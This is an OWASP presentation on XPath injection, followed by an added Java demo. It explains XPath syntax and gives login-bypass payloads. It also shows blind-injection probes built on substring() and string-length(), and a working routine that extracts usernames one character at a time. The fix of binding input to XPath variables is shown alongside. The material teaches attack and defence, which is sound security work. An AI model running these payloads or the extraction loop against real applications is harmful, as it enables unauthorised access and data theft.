
XPath Injection

Roberto Suggi Liverani, Pentester/Researcher

OWASP – XPath Injection overview
Roberto Suggi Liverani, Security Consultant, Security-Assessment.com
21 February 2008
Who am I?

Agenda

What is XPath?

An XML document from XPath perspective (1/2)

An XML document from XPath perspective (2/2)
XPath Syntax (1/3)

Expression   Description
nodename     Selects the child elements of the current node that have the given name
/            Selects from the root node
//           Selects nodes in the document from the current node that match the selection, no matter where they are
.            Selects the current node
..           Selects the parent of the current node

XPath Syntax (2/3)

XPath Syntax – other query examples (3/3)

Expression   Result
users        Selects the users elements that are children of the current node
/users       Selects the root element users
users/user   Selects all user elements that are children of users
//users      Selects all users elements, no matter where they are in the document
users//user  Selects all user elements that are descendants of the users element, no matter where they are under it
XPath Predicates

A predicate, written in square brackets after a step, filters the nodes that step selects.

Expression                   Result
/users/user[1]               Selects the first user element that is a child of the users element
/users/user[last()]          Selects the last user element that is a child of the users element
/users/user[position() < 3]  Selects the first two user elements that are children of the users element
//username[@id = '1']        Selects all username elements that have an attribute named id with the value '1'
XPath Location Path (1/2)

XPath Location Path – Examples (2/2)

Example            Result
child::user        Selects all user elements that are children of the current node
attribute::id      Selects the id attribute of the current node
child::*           Selects all element children of the current node
attribute::*       Selects all attributes of the current node
child::text()      Selects all text node children of the current node
child::node()      Selects all children of the current node, whatever their type (elements, text, comments, ...)
descendant::users  Selects all users elements that are descendants of the current node
XPath Functions

Function                       Description
substring(string, start, len)  Returns the substring of string that starts at position start (the first character is 1) and has length len; if len is omitted, returns everything from start to the end of the string
string-length(string)          Returns the length of the specified string
count(node-set)                Returns the number of nodes in the node-set
starts-with(string1, string2)  Returns true if string1 starts with string2, otherwise false
contains(string1, string2)     Returns true if string1 contains string2, otherwise false
number(arg)                    Returns the numeric value of the argument (a boolean, string or node-set)
string(arg)                    Returns the string value of the argument (a number, boolean or node-set)
XPath Injection (1/2)

The application builds its authentication query by concatenating the submitted username and password straight into the XPath expression (XPath operators are case-sensitive, so the operator is "and", and the element name must match the document, here "users"):

VB:
    Dim FindUserXPath As String
    FindUserXPath = "//users/user[username/text()='" & Request("Username") & "' and password/text()='" & Request("Password") & "']"

C#:
    string FindUserXPath;
    FindUserXPath = "//users/user[username/text()='" + Request["Username"] + "' and password/text()='" + Request["Password"] + "']";

Username = user
Password = password

XPath query becomes:
    //users/user[username/text()='user' and password/text()='password']
XPath Injection (2/2)

Username = user' or '1'='1
Password = password

XPath query becomes:
    //users/user[username/text()='user' or '1'='1' and password/text()='password']

Because "and" binds more tightly than "or", the predicate is evaluated as username/text()='user' or ('1'='1' and password/text()='password'). The node for the account named user therefore matches whatever password was submitted, and the application accepts the login.
Blind XPath Injection (1/3)

Username = user
Password = password

XPath query becomes:
    //users/user[username/text()='user' and password/text()='password']

Username = jjj' or name(//users/user/username[1]) = 'username' or 'a'='b
Password = password

XPath query becomes:
    //users/user[username/text()='jjj' or name(//users/user/username[1]) = 'username' or 'a'='b' and password/text()='password']

No account is called jjj and 'a'='b' is always false (which also neutralises the trailing password check), so the result of the query depends only on the injected condition: the login succeeds exactly when a user element has a child element named username. The application's accept/reject response is a one-bit oracle that lets the attacker confirm guessed element names and, question by question, map the structure of the document.
Blind XPath Injection (2/3)

count(//user/child::node())
    (the total number of child nodes under the user elements, i.e. how many values there are to extract)

Username = root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1
Password = OAhhgg

XPath query becomes:
    //users/user[username/text()='root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1' and password/text()='OAhhgg']

Every term here is joined with "and", so the login succeeds only if root/OAhhgg is a valid account and the first character of the first child node of the second user element is "a". An attacker who already holds one valid account can use it this way to read other users' data one character at a time; without one, the "or" form from the previous slide is used instead.
Blind XPath Injection (3/3)

Further conditions that can be asked through the true/false oracle:

    string-length(//username[position()=1]/child::node()[position()=1])=4
        (is the first username exactly 4 characters long?)
    count(//user/child::node())
        (how many child nodes do the user elements have in total?)
    contains(//username[position()=1]/child::node()[position()=1],"r")
        (does the first username contain the letter r?)
XPath Injection Countermeasures

Bind untrusted input to XPath variables instead of concatenating it into the expression. The evaluator then treats the input as an opaque value, so quotes and operators in it can never change the structure of the query. The slide shows this with a helper that accepts XPathVariable parameters:

    XPathNodeIterator custData = XPathCache.Select(
        "//customer[@name=$name and @password=$password]",
        customersDocument,
        new XPathVariable("name", txtName.Text),
        new XPathVariable("password", txtPassword.Text));

Escaping single quotes in the input is only a partial measure: it does nothing where the value is used outside a quoted string (for example as a number inside a predicate), and a double quote in the data still breaks a double-quoted literal.
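The program below is an added example, not code from the original talk. It puts the concatenated query from the injection slides, the blind extraction loop built from the string-length()/substring() probes, and the variable-binding countermeasure side by side in one runnable file. Java's javax.xml.xpath is used as a stand-in for the .NET code on the slides because the JDK ships an XPath 1.0 engine with variable binding (XPathVariableResolver) in its standard library. The user store, the probe username "x", the lowercase alphabet and the 64-character length cap are all assumptions made for the example.

```java
import java.io.StringReader;
import javax.xml.namespace.QName;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

public class XPathInjectionDemo {

    // Constructed sample user store, shaped like the users/user/username/password
    // document the slides query. Not taken from the original talk.
    static final String USERS_XML =
          "<users>"
        + "<user><username>admin</username><password>s3cret</password></user>"
        + "<user><username>user</username><password>password</password></user>"
        + "</users>";

    static final Document DOC = parse(USERS_XML);

    static Document parse(String xml) {
        try {
            return DocumentBuilderFactory.newInstance().newDocumentBuilder()
                    .parse(new InputSource(new StringReader(xml)));
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    // VULNERABLE: the query is built by string concatenation, exactly like the
    // VB/C# snippet on the slides. Whatever the user types becomes XPath syntax.
    static boolean vulnerableLogin(String username, String password)
            throws XPathExpressionException {
        String query = "//users/user[username/text()='" + username
                + "' and password/text()='" + password + "']";
        NodeList hits = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(query, DOC, XPathConstants.NODESET);
        return hits.getLength() > 0;
    }

    // FIXED: untrusted input is bound to the XPath variables $name and $password.
    // The engine treats them as opaque string values, so quotes and operators in
    // the input can never alter the structure of the query.
    static boolean safeLogin(String username, String password)
            throws XPathExpressionException {
        XPath xp = XPathFactory.newInstance().newXPath();
        xp.setXPathVariableResolver((QName q) -> {
            switch (q.getLocalPart()) {
                case "name":     return username;
                case "password": return password;
                default:         return null;
            }
        });
        NodeList hits = (NodeList) xp.evaluate(
                "//users/user[username/text()=$name and password/text()=$password]",
                DOC, XPathConstants.NODESET);
        return hits.getLength() > 0;
    }

    // Boolean oracle for blind injection, using the "jjj' or COND or 'a'='b" shape
    // from the slides. Since 'and' binds tighter than 'or', the trailing
    // "and password/text()='x'" attaches only to the always-false 'a'='b', so the
    // login result equals COND.
    static boolean oracle(String condition) throws XPathExpressionException {
        return vulnerableLogin("x' or " + condition + " or 'a'='b", "x");
    }

    // Recovers the username of the N-th user (1-based) one character at a time with
    // the string-length() and substring() probes shown on the slides. Assumes the
    // name is lowercase alphanumeric and at most 64 characters long.
    static String blindExtractUsername(int userIndex) throws XPathExpressionException {
        String target = "//user[position()=" + userIndex + "]/username/text()";
        int length = -1;
        for (int n = 1; n <= 64 && length < 0; n++) {
            if (oracle("string-length(" + target + ")=" + n)) length = n;
        }
        if (length < 0) return null;  // no such user, or name outside the assumed bounds
        String alphabet = "abcdefghijklmnopqrstuvwxyz0123456789";
        StringBuilder out = new StringBuilder();
        for (int pos = 1; pos <= length; pos++) {
            for (char c : alphabet.toCharArray()) {
                if (oracle("substring(" + target + "," + pos + ",1)='" + c + "'")) {
                    out.append(c);
                    break;
                }
            }
        }
        return out.toString();
    }

    public static void main(String[] args) throws XPathExpressionException {
        String payload = "user' or '1'='1";
        System.out.println("vulnerable login, wrong password: " + vulnerableLogin(payload, "wrong"));
        System.out.println("fixed login, wrong password:      " + safeLogin(payload, "wrong"));
        System.out.println("blind extraction of user 1:       " + blindExtractUsername(1));
    }
}
```

With the constructed store, vulnerableLogin accepts the payload because the account named user exists and the password term is short-circuited by the precedence of "or"; safeLogin rejects it, since no username equals the literal string user' or '1'='1; and blindExtractUsername(1) recovers admin from nothing but accept/reject responses, one string-length() query per candidate length and one substring() query per candidate character.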
Talk covering the basics of XPath and injection attacks against applications that use XPath as a query language.
